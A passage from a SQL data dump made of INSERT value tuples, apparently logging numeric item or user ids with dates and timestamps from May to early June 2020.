07:23:31'),(2614,2801,1,'2020-05-04','2020-05-04 08:52:44'),(2615,2609,1,'2020-05-04','2020-05-04 13:46:31'),(2616,80,1,'2020-05-04','2020-05-04 14:06:39'),(2617,2934,1,'2020-05-04','2020-05-04 15:18:21'),(2618,570,1,'2020-05-04','2020-05-04 19:26:18'),(2619,2609,1,'2020-05-04','2020-05-04 20:12:57'),(2620,80,1,'2020-05-04','2020-05-04 21:24:13'),(2621,3038,1,'2020-05-04','2020-05-04 21:28:08'),(2622,108,1,'2020-05-05','2020-05-05 01:35:10'),(2623,108,1,'2020-05-05','2020-05-05 02:24:59'),(2624,3038,1,'2020-05-05','2020-05-05 06:59:38'),(2625,570,1,'2020-05-05','2020-05-05 07:47:07'),(2626,108,1,'2020-05-05','2020-05-05 13:28:53'),(2627,2609,1,'2020-05-05','2020-05-05 17:16:55'),(2628,2609,1,'2020-05-05','2020-05-05 17:17:19'),(2629,2609,1,'2020-05-05','2020-05-05 17:17:32'),(2630,3038,1,'2020-05-05','2020-05-05 17:35:10'),(2631,108,1,'2020-05-06','2020-05-06 00:31:17'),(2632,3038,1,'2020-05-06','2020-05-06 03:24:01'),(2633,108,1,'2020-05-06','2020-05-06 05:43:23'),(2634,2309,1,'2020-05-06','2020-05-06 11:20:02'),(2635,1604,1,'2020-05-06','2020-05-06 12:21:53'),(2636,108,1,'2020-05-06','2020-05-06 12:25:03'),(2637,2309,1,'2020-05-06','2020-05-06 14:24:03'),(2638,3038,1,'2020-05-06','2020-05-06 14:30:36'),(2639,1604,1,'2020-05-06','2020-05-06 15:48:13'),(2640,1600,1,'2020-05-06','2020-05-06 23:09:09'),(2641,486,1,'2020-05-06','2020-05-06 23:19:38'),(2642,1600,1,'2020-05-06','2020-05-06 23:19:51'),(2643,1600,1,'2020-05-06','2020-05-06 23:37:13'),(2644,1600,1,'2020-05-07','2020-05-07 01:09:11'),(2645,1600,1,'2020-05-07','2020-05-07 01:34:23'),(2646,3038,1,'2020-05-07','2020-05-07 06:39:57'),(2647,108,1,'2020-05-07','2020-05-07 08:30:30'),(2648,108,1,'2020-05-07','2020-05-07 10:16:11'),(2649,108,1,'2020-05-07','2020-05-07 12:21:00'),(2650,2457,1,'2020-05-07','2020-05-07 13:27:25'),(2651,1737,1,'2020-05-07','2020-05-07 14:29:54'),(2652,3038,1,'2020-05-07','2020-05-07 15:55:10'),(2653,1582,1,'2020-05-07','2020-05-07 18:33:17'),(2654,1751,1,'2020-05-07','2020-05-07 18:35:46'),(2655,1582,1,'2020-05-07','2020-05-07 18:36:54'),(2656,108,1,'2020-05-07','2020-05-07 20:13:37'),(2657,108,1,'2020-05-07','2020-05-07 22:34:11'),(2658,3038,1,'2020-05-08','2020-05-08 02:04:29'),(2659,80,1,'2020-05-08','2020-05-08 04:31:50'),(2660,108,1,'2020-05-08','2020-05-08 05:26:11'),(2661,108,1,'2020-05-08','2020-05-08 09:56:53'),(2662,1582,1,'2020-05-08','2020-05-08 12:05:20'),(2663,3030,1,'2020-05-08','2020-05-08 15:36:40'),(2664,108,1,'2020-05-08','2020-05-08 16:27:19'),(2665,1588,1,'2020-05-08','2020-05-08 16:27:21'),(2666,1600,1,'2020-05-08','2020-05-08 18:58:27'),(2667,1600,1,'2020-05-09','2020-05-09 09:08:46'),(2668,89,1,'2020-05-09','2020-05-09 15:07:57'),(2669,1586,1,'2020-05-09','2020-05-09 15:08:15'),(2670,1582,1,'2020-05-09','2020-05-09 18:31:06'),(2671,1582,1,'2020-05-09','2020-05-09 18:31:12'),(2672,1582,1,'2020-05-09','2020-05-09 18:31:13'),(2673,1582,1,'2020-05-09','2020-05-09 18:31:13'),(2674,2154,1,'2020-05-09','2020-05-09 18:31:37'),(2675,2154,1,'2020-05-09','2020-05-09 18:31:42'),(2676,2154,1,'2020-05-09','2020-05-09 18:31:42'),(2677,1582,1,'2020-05-09','2020-05-09 18:31:59'),(2678,1544,1,'2020-05-09','2020-05-09 20:44:31'),(2679,3030,1,'2020-05-09','2020-05-09 21:25:07'),(2680,91,1,'2020-05-10','2020-05-10 11:19:42'),(2681,91,1,'2020-05-10','2020-05-10 11:24:22'),(2682,1747,1,'2020-05-10','2020-05-10 11:25:25'),(2683,1747,1,'2020-05-10','2020-05-10 11:25:34'),(2684,1747,1,'2020-05-10','2020-05-10 11:31:10'),(2685,91,1,'2020-05-10','2020-05-10 11:31:19'),(2686,1745,1,'2020-05-10','2020-05-10 11:31:37'),(2687,1745,1,'2020-05-10','2020-05-10 11:31:54'),(2688,91,1,'2020-05-10','2020-05-10 11:33:34'),(2689,1751,1,'2020-05-10','2020-05-10 11:34:02'),(2690,1751,1,'2020-05-10','2020-05-10 11:34:15'),(2691,1751,1,'2020-05-10','2020-05-10 11:35:05'),(2692,91,1,'2020-05-10','2020-05-10 11:35:11'),(2693,2150,1,'2020-05-10','2020-05-10 23:01:10'),(2694,1600,1,'2020-05-11','2020-05-11 13:16:00'),(2695,108,1,'2020-05-11','2020-05-11 14:05:55'),(2696,1604,1,'2020-05-11','2020-05-11 14:27:22'),(2697,80,1,'2020-05-11','2020-05-11 16:08:14'),(2698,68,1,'2020-05-11','2020-05-11 16:08:35'),(2699,84,1,'2020-05-11','2020-05-11 16:08:47'),(2700,87,1,'2020-05-11','2020-05-11 16:08:57'),(2701,89,1,'2020-05-11','2020-05-11 16:09:07'),(2702,91,1,'2020-05-11','2020-05-11 16:09:17'),(2703,76,1,'2020-05-11','2020-05-11 16:09:21'),(2704,72,1,'2020-05-11','2020-05-11 16:09:33'),(2705,335,1,'2020-05-11','2020-05-11 16:09:43'),(2706,108,1,'2020-05-11','2020-05-11 16:09:53'),(2707,2503,1,'2020-05-11','2020-05-11 16:10:03'),(2708,2904,1,'2020-05-11','2020-05-11 16:10:13'),(2709,487,1,'2020-05-11','2020-05-11 16:10:23'),(2710,91,1,'2020-05-11','2020-05-11 16:30:38'),(2711,91,1,'2020-05-11','2020-05-11 16:33:59'),(2712,1768,1,'2020-05-11','2020-05-11 16:34:37'),(2713,91,1,'2020-05-11','2020-05-11 16:36:26'),(2714,2063,1,'2020-05-11','2020-05-11 16:37:00'),(2715,2063,1,'2020-05-11','2020-05-11 16:37:16'),(2716,91,1,'2020-05-11','2020-05-11 16:38:39'),(2717,1697,1,'2020-05-11','2020-05-11 16:39:28'),(2718,1697,1,'2020-05-11','2020-05-11 16:40:24'),(2719,91,1,'2020-05-11','2020-05-11 16:41:29'),(2720,76,1,'2020-05-11','2020-05-11 18:28:20'),(2721,1604,1,'2020-05-11','2020-05-11 19:47:30'),(2722,80,1,'2020-05-11','2020-05-11 20:07:35'),(2723,89,1,'2020-05-11','2020-05-11 20:07:52'),(2724,80,1,'2020-05-11','2020-05-11 20:09:28'),(2725,473,1,'2020-05-11','2020-05-11 20:27:30'),(2726,2309,1,'2020-05-11','2020-05-11 22:49:14'),(2727,1726,1,'2020-05-11','2020-05-11 23:22:46'),(2728,2309,1,'2020-05-11','2020-05-11 23:25:02'),(2729,2751,1,'2020-05-12','2020-05-12 05:26:49'),(2730,2309,1,'2020-05-12','2020-05-12 06:10:30'),(2731,2309,1,'2020-05-12','2020-05-12 07:29:52'),(2732,108,1,'2020-05-12','2020-05-12 08:54:45'),(2733,2751,1,'2020-05-12','2020-05-12 09:19:15'),(2734,1705,1,'2020-05-12','2020-05-12 09:19:25'),(2735,108,1,'2020-05-12','2020-05-12 16:42:53'),(2736,1600,1,'2020-05-12','2020-05-12 16:52:49'),(2737,1600,1,'2020-05-12','2020-05-12 20:22:45'),(2738,1600,1,'2020-05-12','2020-05-12 20:22:51'),(2739,1600,1,'2020-05-12','2020-05-12 20:22:51'),(2740,1600,1,'2020-05-12','2020-05-12 20:26:37'),(2741,1588,1,'2020-05-13','2020-05-13 05:18:14'),(2742,2904,1,'2020-05-13','2020-05-13 16:38:28'),(2743,1588,1,'2020-05-13','2020-05-13 17:12:22'),(2744,2801,1,'2020-05-13','2020-05-13 17:50:48'),(2745,2801,1,'2020-05-13','2020-05-13 18:30:35'),(2746,1588,1,'2020-05-13','2020-05-13 19:08:32'),(2747,3030,1,'2020-05-13','2020-05-13 22:55:04'),(2748,486,1,'2020-05-13','2020-05-13 23:59:51'),(2749,1600,1,'2020-05-14','2020-05-14 01:08:04'),(2750,2813,1,'2020-05-14','2020-05-14 02:23:45'),(2751,486,1,'2020-05-14','2020-05-14 02:52:33'),(2752,1600,1,'2020-05-14','2020-05-14 03:43:25'),(2753,2993,1,'2020-05-14','2020-05-14 06:54:39'),(2754,1604,1,'2020-05-14','2020-05-14 06:56:56'),(2755,3045,1,'2020-05-14','2020-05-14 13:27:15'),(2756,1604,1,'2020-05-14','2020-05-14 14:56:00'),(2757,1604,1,'2020-05-14','2020-05-14 14:57:28'),(2758,2309,1,'2020-05-14','2020-05-14 19:47:02'),(2759,72,1,'2020-05-15','2020-05-15 02:01:22'),(2760,2769,1,'2020-05-15','2020-05-15 02:37:06'),(2761,80,1,'2020-05-15','2020-05-15 04:47:02'),(2762,1588,1,'2020-05-15','2020-05-15 09:08:22'),(2763,89,1,'2020-05-15','2020-05-15 09:39:58'),(2764,1600,1,'2020-05-15','2020-05-15 09:40:52'),(2765,84,1,'2020-05-15','2020-05-15 09:47:00'),(2766,89,1,'2020-05-15','2020-05-15 09:54:32'),(2767,89,1,'2020-05-15','2020-05-15 09:55:21'),(2768,68,1,'2020-05-15','2020-05-15 10:11:54'),(2769,89,1,'2020-05-15','2020-05-15 10:12:57'),(2770,89,1,'2020-05-15','2020-05-15 10:13:40'),(2771,89,1,'2020-05-15','2020-05-15 10:14:26'),(2772,1598,1,'2020-05-15','2020-05-15 10:14:49'),(2773,89,1,'2020-05-15','2020-05-15 10:21:05'),(2774,1582,1,'2020-05-15','2020-05-15 10:21:30'),(2775,91,1,'2020-05-15','2020-05-15 10:29:12'),(2776,2457,1,'2020-05-15','2020-05-15 10:39:14'),(2777,1600,1,'2020-05-15','2020-05-15 11:40:43'),(2778,474,1,'2020-05-15','2020-05-15 11:44:13'),(2779,474,1,'2020-05-15','2020-05-15 11:44:34'),(2780,91,1,'2020-05-15','2020-05-15 11:44:55'),(2781,68,1,'2020-05-15','2020-05-15 11:45:22'),(2782,68,1,'2020-05-15','2020-05-15 11:45:37'),(2783,76,1,'2020-05-15','2020-05-15 11:46:04'),(2784,91,1,'2020-05-15','2020-05-15 11:46:17'),(2785,84,1,'2020-05-15','2020-05-15 11:46:35'),(2786,80,1,'2020-05-15','2020-05-15 11:49:00'),(2787,3038,1,'2020-05-15','2020-05-15 11:49:37'),(2788,87,1,'2020-05-15','2020-05-15 12:33:24'),(2789,89,1,'2020-05-15','2020-05-15 12:34:11'),(2790,2503,1,'2020-05-15','2020-05-15 12:44:51'),(2791,91,1,'2020-05-15','2020-05-15 13:57:02'),(2792,2503,1,'2020-05-15','2020-05-15 13:59:40'),(2793,2904,1,'2020-05-15','2020-05-15 14:07:54'),(2794,2904,1,'2020-05-15','2020-05-15 14:08:55'),(2795,2904,1,'2020-05-15','2020-05-15 14:13:46'),(2796,2904,1,'2020-05-15','2020-05-15 14:13:48'),(2797,72,1,'2020-05-15','2020-05-15 14:14:18'),(2798,2971,1,'2020-05-15','2020-05-15 14:14:35'),(2799,2557,1,'2020-05-15','2020-05-15 14:15:07'),(2800,68,1,'2020-05-15','2020-05-15 14:18:06'),(2801,76,1,'2020-05-15','2020-05-15 14:19:03'),(2802,335,1,'2020-05-15','2020-05-15 14:23:02'),(2803,108,1,'2020-05-15','2020-05-15 14:23:49'),(2804,80,1,'2020-05-15','2020-05-15 14:29:47'),(2805,2410,1,'2020-05-15','2020-05-15 14:31:14'),(2806,80,1,'2020-05-15','2020-05-15 14:32:26'),(2807,2658,1,'2020-05-15','2020-05-15 20:32:12'),(2808,2751,1,'2020-05-16','2020-05-16 02:43:40'),(2809,2991,1,'2020-05-16','2020-05-16 07:31:08'),(2810,1600,1,'2020-05-16','2020-05-16 13:20:22'),(2811,1592,1,'2020-05-16','2020-05-16 13:22:38'),(2812,2971,1,'2020-05-16','2020-05-16 14:00:57'),(2813,1737,1,'2020-05-16','2020-05-16 14:40:24'),(2814,335,1,'2020-05-16','2020-05-16 15:51:11'),(2815,80,1,'2020-05-16','2020-05-16 21:52:54'),(2816,91,1,'2020-05-17','2020-05-17 01:19:43'),(2817,91,1,'2020-05-17','2020-05-17 01:20:03'),(2818,91,1,'2020-05-17','2020-05-17 01:20:16'),(2819,2658,1,'2020-05-17','2020-05-17 01:21:54'),(2820,91,1,'2020-05-17','2020-05-17 01:22:11'),(2821,91,1,'2020-05-17','2020-05-17 01:22:28'),(2822,2658,1,'2020-05-17','2020-05-17 01:23:17'),(2823,80,1,'2020-05-17','2020-05-17 01:24:46'),(2824,2658,1,'2020-05-17','2020-05-17 01:25:27'),(2825,1749,1,'2020-05-17','2020-05-17 01:25:40'),(2826,1600,1,'2020-05-17','2020-05-17 08:11:16'),(2827,1600,1,'2020-05-17','2020-05-17 11:11:00'),(2828,1600,1,'2020-05-17','2020-05-17 11:13:14'),(2829,1772,1,'2020-05-17','2020-05-17 11:13:51'),(2830,1600,1,'2020-05-17','2020-05-17 11:15:49'),(2831,1600,1,'2020-05-17','2020-05-17 14:25:45'),(2832,1592,1,'2020-05-17','2020-05-17 14:25:46'),(2833,570,1,'2020-05-17','2020-05-17 22:19:14'),(2834,3041,1,'2020-05-18','2020-05-18 01:58:37'),(2835,84,1,'2020-05-18','2020-05-18 05:33:38'),(2836,474,1,'2020-05-18','2020-05-18 08:48:24'),(2837,68,1,'2020-05-18','2020-05-18 10:32:39'),(2838,76,1,'2020-05-18','2020-05-18 11:53:16'),(2839,2503,1,'2020-05-18','2020-05-18 12:13:13'),(2840,1703,1,'2020-05-18','2020-05-18 12:54:23'),(2841,2911,1,'2020-05-18','2020-05-18 16:56:44'),(2842,2410,1,'2020-05-18','2020-05-18 19:54:57'),(2843,2965,1,'2020-05-19','2020-05-19 00:10:39'),(2844,2804,1,'2020-05-19','2020-05-19 00:47:15'),(2845,1582,1,'2020-05-19','2020-05-19 01:59:50'),(2846,89,1,'2020-05-19','2020-05-19 06:39:35'),(2847,1718,1,'2020-05-19','2020-05-19 07:48:45'),(2848,1592,1,'2020-05-19','2020-05-19 09:09:28'),(2849,2934,1,'2020-05-19','2020-05-19 09:18:51'),(2850,3005,1,'2020-05-19','2020-05-19 10:19:58'),(2851,1600,1,'2020-05-19','2020-05-19 10:27:14'),(2852,1737,1,'2020-05-19','2020-05-19 10:38:03'),(2853,2964,1,'2020-05-19','2020-05-19 11:13:43'),(2854,1614,1,'2020-05-19','2020-05-19 11:30:17'),(2855,1614,1,'2020-05-19','2020-05-19 11:38:16'),(2856,1614,1,'2020-05-19','2020-05-19 12:08:10'),(2857,2457,1,'2020-05-19','2020-05-19 12:19:48'),(2858,74,1,'2020-05-19','2020-05-19 13:00:35'),(2859,3030,1,'2020-05-19','2020-05-19 13:02:02'),(2860,2956,1,'2020-05-19','2020-05-19 13:03:35'),(2861,3041,1,'2020-05-19','2020-05-19 13:08:05'),(2862,1598,1,'2020-05-19','2020-05-19 13:31:15'),(2863,1600,1,'2020-05-19','2020-05-19 13:35:04'),(2864,1600,1,'2020-05-19','2020-05-19 13:35:16'),(2865,1745,1,'2020-05-19','2020-05-19 13:37:23'),(2866,1600,1,'2020-05-19','2020-05-19 13:38:07'),(2867,1728,1,'2020-05-19','2020-05-19 15:22:00'),(2868,1766,1,'2020-05-19','2020-05-19 23:06:25'),(2869,80,1,'2020-05-20','2020-05-20 12:41:16'),(2870,570,1,'2020-05-20','2020-05-20 14:21:30'),(2871,68,1,'2020-05-20','2020-05-20 15:09:06'),(2872,1604,1,'2020-05-20','2020-05-20 19:39:53'),(2873,1604,1,'2020-05-20','2020-05-20 19:40:36'),(2874,1604,1,'2020-05-20','2020-05-20 19:40:41'),(2875,1604,1,'2020-05-20','2020-05-20 19:40:55'),(2876,2154,1,'2020-05-20','2020-05-20 20:12:21'),(2877,486,1,'2020-05-21','2020-05-21 03:21:21'),(2878,1600,1,'2020-05-21','2020-05-21 05:00:22'),(2879,2751,1,'2020-05-21','2020-05-21 06:52:33'),(2880,1718,1,'2020-05-21','2020-05-21 12:08:46'),(2881,1600,1,'2020-05-21','2020-05-21 15:35:25'),(2882,2769,1,'2020-05-22','2020-05-22 01:41:59'),(2883,1600,1,'2020-05-22','2020-05-22 10:55:25'),(2884,1588,1,'2020-05-22','2020-05-22 11:31:05'),(2885,1600,1,'2020-05-22','2020-05-22 13:18:05'),(2886,80,1,'2020-05-22','2020-05-22 20:21:29'),(2887,472,1,'2020-05-23','2020-05-23 03:35:15'),(2888,91,1,'2020-05-23','2020-05-23 05:27:31'),(2889,1600,1,'2020-05-23','2020-05-23 07:12:29'),(2890,1588,1,'2020-05-23','2020-05-23 11:09:23'),(2891,1730,1,'2020-05-23','2020-05-23 11:49:13'),(2892,2751,1,'2020-05-23','2020-05-23 21:25:13'),(2893,2609,1,'2020-05-23','2020-05-23 21:43:13'),(2894,1588,1,'2020-05-23','2020-05-23 23:14:39'),(2895,1730,1,'2020-05-24','2020-05-24 00:21:11'),(2896,1594,1,'2020-05-24','2020-05-24 05:14:51'),(2897,2801,1,'2020-05-24','2020-05-24 05:33:19'),(2898,1588,1,'2020-05-24','2020-05-24 10:55:13'),(2899,1730,1,'2020-05-24','2020-05-24 12:29:04'),(2900,2813,1,'2020-05-24','2020-05-24 13:06:04'),(2901,87,1,'2020-05-24','2020-05-24 20:54:46'),(2902,72,1,'2020-05-24','2020-05-24 20:55:19'),(2903,76,1,'2020-05-24','2020-05-24 20:56:08'),(2904,487,1,'2020-05-24','2020-05-24 21:01:50'),(2905,2609,1,'2020-05-24','2020-05-24 22:18:42'),(2906,2801,1,'2020-05-24','2020-05-24 22:24:22'),(2907,2309,1,'2020-05-25','2020-05-25 00:09:23'),(2908,84,1,'2020-05-25','2020-05-25 00:19:29'),(2909,1600,1,'2020-05-25','2020-05-25 05:19:45'),(2910,2956,1,'2020-05-25','2020-05-25 07:02:48'),(2911,2956,1,'2020-05-25','2020-05-25 07:03:31'),(2912,1582,1,'2020-05-25','2020-05-25 11:33:38'),(2913,89,1,'2020-05-25','2020-05-25 11:35:31'),(2914,2769,1,'2020-05-25','2020-05-25 11:36:40'),(2915,2457,1,'2020-05-25','2020-05-25 11:37:48'),(2916,1582,1,'2020-05-25','2020-05-25 11:37:55'),(2917,1590,1,'2020-05-25','2020-05-25 11:38:28'),(2918,1614,1,'2020-05-25','2020-05-25 11:40:38'),(2919,3004,1,'2020-05-25','2020-05-25 11:40:39'),(2920,1604,1,'2020-05-25','2020-05-25 12:44:40'),(2921,1604,1,'2020-05-25','2020-05-25 12:45:21'),(2922,76,1,'2020-05-25','2020-05-25 12:46:41'),(2923,1604,1,'2020-05-25','2020-05-25 13:22:28'),(2924,1600,1,'2020-05-25','2020-05-25 13:37:08'),(2925,2457,1,'2020-05-25','2020-05-25 15:04:40'),(2926,80,1,'2020-05-25','2020-05-25 15:23:49'),(2927,2395,1,'2020-05-25','2020-05-25 15:23:56'),(2928,1594,1,'2020-05-25','2020-05-25 17:00:52'),(2929,1604,1,'2020-05-25','2020-05-25 18:32:03'),(2930,2503,1,'2020-05-25','2020-05-25 18:58:22'),(2931,76,1,'2020-05-25','2020-05-25 18:58:36'),(2932,68,1,'2020-05-25','2020-05-25 18:58:51'),(2933,1600,1,'2020-05-25','2020-05-25 22:41:53'),(2934,1588,1,'2020-05-25','2020-05-25 22:44:50'),(2935,1588,1,'2020-05-25','2020-05-25 23:12:12'),(2936,2609,1,'2020-05-26','2020-05-26 00:41:53'),(2937,2309,1,'2020-05-26','2020-05-26 03:42:15'),(2938,80,1,'2020-05-26','2020-05-26 03:52:14'),(2939,1594,1,'2020-05-26','2020-05-26 05:52:21'),(2940,1588,1,'2020-05-26','2020-05-26 13:26:15'),(2941,1594,1,'2020-05-26','2020-05-26 13:37:55'),(2942,2989,1,'2020-05-26','2020-05-26 13:39:29'),(2943,76,1,'2020-05-26','2020-05-26 13:40:00'),(2944,1594,1,'2020-05-26','2020-05-26 13:41:45'),(2945,76,1,'2020-05-26','2020-05-26 13:46:38'),(2946,1594,1,'2020-05-26','2020-05-26 13:46:52'),(2947,2609,1,'2020-05-26','2020-05-26 14:20:17'),(2948,1604,1,'2020-05-26','2020-05-26 14:56:56'),(2949,2309,1,'2020-05-26','2020-05-26 16:37:05'),(2950,1600,1,'2020-05-26','2020-05-26 19:59:01'),(2951,2801,1,'2020-05-26','2020-05-26 23:26:07'),(2952,2801,1,'2020-05-26','2020-05-26 23:41:36'),(2953,2609,1,'2020-05-27','2020-05-27 00:40:36'),(2954,1588,1,'2020-05-27','2020-05-27 02:20:58'),(2955,2309,1,'2020-05-27','2020-05-27 02:31:15'),(2956,1600,1,'2020-05-27','2020-05-27 05:42:18'),(2957,2457,1,'2020-05-27','2020-05-27 09:19:16'),(2958,1588,1,'2020-05-27','2020-05-27 13:32:42'),(2959,2309,1,'2020-05-27','2020-05-27 14:23:25'),(2960,1782,1,'2020-05-27','2020-05-27 14:24:06'),(2961,2309,1,'2020-05-27','2020-05-27 14:55:53'),(2962,1600,1,'2020-05-27','2020-05-27 16:46:00'),(2963,80,1,'2020-05-27','2020-05-27 22:48:42'),(2964,1730,1,'2020-05-27','2020-05-27 23:35:44'),(2965,2154,1,'2020-05-28','2020-05-28 00:56:28'),(2966,89,1,'2020-05-28','2020-05-28 02:30:01'),(2967,486,1,'2020-05-28','2020-05-28 03:05:41'),(2968,1600,1,'2020-05-28','2020-05-28 03:48:23'),(2969,1588,1,'2020-05-28','2020-05-28 05:01:16'),(2970,2801,1,'2020-05-28','2020-05-28 05:17:32'),(2971,486,1,'2020-05-28','2020-05-28 05:21:14'),(2972,2769,1,'2020-05-28','2020-05-28 05:51:22'),(2973,2993,1,'2020-05-28','2020-05-28 07:27:32'),(2974,80,1,'2020-05-28','2020-05-28 07:51:42'),(2975,1730,1,'2020-05-28','2020-05-28 08:11:48'),(2976,68,1,'2020-05-28','2020-05-28 10:52:58'),(2977,2813,1,'2020-05-28','2020-05-28 11:02:41'),(2978,72,1,'2020-05-28','2020-05-28 11:25:13'),(2979,91,1,'2020-05-28','2020-05-28 12:14:41'),(2980,80,1,'2020-05-28','2020-05-28 12:26:08'),(2981,91,1,'2020-05-28','2020-05-28 12:28:06'),(2982,2309,1,'2020-05-28','2020-05-28 12:57:08'),(2983,2457,1,'2020-05-28','2020-05-28 12:58:48'),(2984,1614,1,'2020-05-28','2020-05-28 16:36:40'),(2985,72,1,'2020-05-28','2020-05-28 16:39:19'),(2986,3051,1,'2020-05-28','2020-05-28 16:39:28'),(2987,3051,1,'2020-05-28','2020-05-28 16:41:35'),(2988,3051,1,'2020-05-28','2020-05-28 16:41:40'),(2989,3051,1,'2020-05-28','2020-05-28 16:55:03'),(2990,72,1,'2020-05-28','2020-05-28 16:55:08'),(2991,3053,1,'2020-05-28','2020-05-28 16:56:52'),(2992,72,1,'2020-05-28','2020-05-28 16:59:08'),(2993,3053,1,'2020-05-28','2020-05-28 16:59:13'),(2994,3051,1,'2020-05-28','2020-05-28 17:03:16'),(2995,80,1,'2020-05-28','2020-05-28 19:57:24'),(2996,1588,1,'2020-05-28','2020-05-28 22:28:25'),(2997,473,1,'2020-05-28','2020-05-28 23:19:19'),(2998,2801,1,'2020-05-28','2020-05-28 23:43:10'),(2999,3045,1,'2020-05-28','2020-05-28 23:54:53'),(3000,1724,1,'2020-05-29','2020-05-29 01:09:29'),(3001,1730,1,'2020-05-29','2020-05-29 01:39:43'),(3002,89,1,'2020-05-29','2020-05-29 02:18:13'),(3003,2457,1,'2020-05-29','2020-05-29 02:18:28'),(3004,89,1,'2020-05-29','2020-05-29 02:19:21'),(3005,1544,1,'2020-05-29','2020-05-29 02:19:33'),(3006,89,1,'2020-05-29','2020-05-29 02:29:58'),(3007,1596,1,'2020-05-29','2020-05-29 02:30:37'),(3008,1596,1,'2020-05-29','2020-05-29 02:30:45'),(3009,1596,1,'2020-05-29','2020-05-29 02:30:59'),(3010,89,1,'2020-05-29','2020-05-29 02:31:13'),(3011,1592,1,'2020-05-29','2020-05-29 02:31:28'),(3012,89,1,'2020-05-29','2020-05-29 02:31:44'),(3013,1598,1,'2020-05-29','2020-05-29 02:31:49'),(3014,89,1,'2020-05-29','2020-05-29 02:36:37'),(3015,1594,1,'2020-05-29','2020-05-29 02:36:42'),(3016,89,1,'2020-05-29','2020-05-29 02:37:58'),(3017,1604,1,'2020-05-29','2020-05-29 02:38:14'),(3018,1604,1,'2020-05-29','2020-05-29 02:38:21'),(3019,89,1,'2020-05-29','2020-05-29 02:39:42'),(3020,1608,1,'2020-05-29','2020-05-29 02:39:58'),(3021,87,1,'2020-05-29','2020-05-29 04:28:58'),(3022,487,1,'2020-05-29','2020-05-29 06:12:51'),(3023,2609,1,'2020-05-29','2020-05-29 06:41:48'),(3024,477,1,'2020-05-29','2020-05-29 06:53:09'),(3025,1588,1,'2020-05-29','2020-05-29 08:22:36'),(3026,2801,1,'2020-05-29','2020-05-29 08:38:06'),(3027,80,1,'2020-05-29','2020-05-29 10:23:41'),(3028,2309,1,'2020-05-29','2020-05-29 12:24:01'),(3029,2751,1,'2020-05-29','2020-05-29 13:53:52'),(3030,2813,1,'2020-05-29','2020-05-29 13:54:04'),(3031,87,1,'2020-05-29','2020-05-29 14:01:50'),(3032,3045,1,'2020-05-29','2020-05-29 14:27:26'),(3033,91,1,'2020-05-29','2020-05-29 14:43:43'),(3034,72,1,'2020-05-29','2020-05-29 15:04:18'),(3035,3055,1,'2020-05-29','2020-05-29 15:05:52'),(3036,72,1,'2020-05-29','2020-05-29 15:06:55'),(3037,72,1,'2020-05-29','2020-05-29 15:42:35'),(3038,2609,1,'2020-05-29','2020-05-29 15:53:54'),(3039,72,1,'2020-05-29','2020-05-29 16:03:33'),(3040,3056,1,'2020-05-29','2020-05-29 16:03:42'),(3041,72,1,'2020-05-29','2020-05-29 16:13:53'),(3042,3056,1,'2020-05-29','2020-05-29 16:14:02'),(3043,3034,1,'2020-05-29','2020-05-29 16:21:08'),(3044,3034,1,'2020-05-29','2020-05-29 16:21:21'),(3045,72,1,'2020-05-29','2020-05-29 16:24:25'),(3046,1588,1,'2020-05-29','2020-05-29 16:43:52'),(3047,72,1,'2020-05-29','2020-05-29 17:54:31'),(3048,2801,1,'2020-05-29','2020-05-29 19:07:27'),(3049,91,1,'2020-05-29','2020-05-29 19:20:26'),(3050,335,1,'2020-05-29','2020-05-29 19:20:27'),(3051,2751,1,'2020-05-29','2020-05-29 19:20:29'),(3052,80,1,'2020-05-29','2020-05-29 20:04:41'),(3053,570,1,'2020-05-29','2020-05-29 21:05:03'),(3054,89,1,'2020-05-29','2020-05-29 22:05:00'),(3055,89,1,'2020-05-29','2020-05-29 22:10:49'),(3056,1780,1,'2020-05-29','2020-05-29 23:15:10'),(3057,1734,1,'2020-05-29','2020-05-29 23:17:15'),(3058,2309,1,'2020-05-29','2020-05-29 23:56:03'),(3059,3053,1,'2020-05-30','2020-05-30 01:21:54'),(3060,3051,1,'2020-05-30','2020-05-30 01:22:26'),(3061,3055,1,'2020-05-30','2020-05-30 01:23:28'),(3062,3056,1,'2020-05-30','2020-05-30 01:23:46'),(3063,2813,1,'2020-05-30','2020-05-30 01:24:20'),(3064,2751,1,'2020-05-30','2020-05-30 07:31:31'),(3065,2309,1,'2020-05-30','2020-05-30 08:27:41'),(3066,2309,1,'2020-05-30','2020-05-30 13:22:46'),(3067,2609,1,'2020-05-30','2020-05-30 14:21:04'),(3068,2801,1,'2020-05-30','2020-05-30 14:31:08'),(3069,80,1,'2020-05-30','2020-05-30 15:11:32'),(3070,1588,1,'2020-05-30','2020-05-30 15:21:23'),(3071,2813,1,'2020-05-30','2020-05-30 16:52:50'),(3072,3034,1,'2020-05-30','2020-05-30 18:10:01'),(3073,72,1,'2020-05-30','2020-05-30 18:12:42'),(3074,467,1,'2020-05-30','2020-05-30 21:57:54'),(3075,72,1,'2020-05-31','2020-05-31 01:35:12'),(3076,72,1,'2020-05-31','2020-05-31 01:35:34'),(3077,80,1,'2020-05-31','2020-05-31 02:24:01'),(3078,80,1,'2020-05-31','2020-05-31 02:35:26'),(3079,68,1,'2020-05-31','2020-05-31 02:38:28'),(3080,1588,1,'2020-05-31','2020-05-31 10:28:54'),(3081,2813,1,'2020-05-31','2020-05-31 10:51:52'),(3082,72,1,'2020-05-31','2020-05-31 12:39:15'),(3083,1600,1,'2020-05-31','2020-05-31 13:25:23'),(3084,1600,1,'2020-05-31','2020-05-31 13:27:04'),(3085,1600,1,'2020-05-31','2020-05-31 13:28:09'),(3086,3058,1,'2020-05-31','2020-05-31 14:44:18'),(3087,2609,1,'2020-05-31','2020-05-31 14:59:56'),(3088,80,1,'2020-05-31','2020-05-31 15:19:45'),(3089,3034,1,'2020-05-31','2020-05-31 15:30:44'),(3090,3045,1,'2020-05-31','2020-05-31 16:22:19'),(3091,2769,1,'2020-05-31','2020-05-31 18:40:48'),(3092,2309,1,'2020-05-31','2020-05-31 21:50:15'),(3093,2813,1,'2020-05-31','2020-05-31 23:26:02'),(3094,2609,1,'2020-06-01','2020-06-01 02:14:02'),(3095,80,1,'2020-06-01','2020-06-01 02:31:22'),(3096,72,1,'2020-06-01','2020-06-01 02:53:06'),(3097,1588,1,'2020-06-01','2020-06-01 03:43:11'),(3098,2813,1,'2020-06-01','2020-06-01 09:59:44'),(3099,2609,1,'2020-06-01','2020-06-01 11:46:40'),(3100,3034,1,'2020-06-01','2020-06-01 12:46:02'),(3101,68,1,'2020-06-01','2020-06-01 13:39:36'),(3102,1588,1,'2020-06-01','2020-06-01 